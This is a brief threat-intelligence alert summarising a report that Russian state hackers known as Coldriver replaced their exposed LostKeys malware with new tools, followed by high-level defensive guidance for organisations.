Google finds Russian state hackers replacing burned malware with new tools
Category:Threat Alerts / Threat Intelligence
Google’s TAG reports Coldriver (aka Star Blizzard/Callisto/UNC4057) rapidly replaced its exposed LostKeys malware with a new toolchain: NOROBOT initial payload, YESROBOT backdoor, and MAYBEROBOT successor. Campaign tempo increased within days of disclosure, indicating iterative TTP evolution and emphasis on stealthy persistence.
CORTEX Protocol Intelligence Assessment
Business Impact: Persistent espionage risk for NGOs, media, academia, and policy institutions. Technical Context: Fake CAPTCHA lures, staged payloads, and refined backdoor stability signal adaptive tradecraft.
Strategic Intelligence Guidance
- Block known lure infra; enforce browser isolation for high‑risk roles.
- Hunt for DLL sideloading and suspicious persistence artifacts.
- Apply strict MFA and conditional access for email access.
- Monitor for data staging on user endpoints post‑phish.
Vendors
Threats
Targets
Intelligence Source: Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News | Oct 22, 2025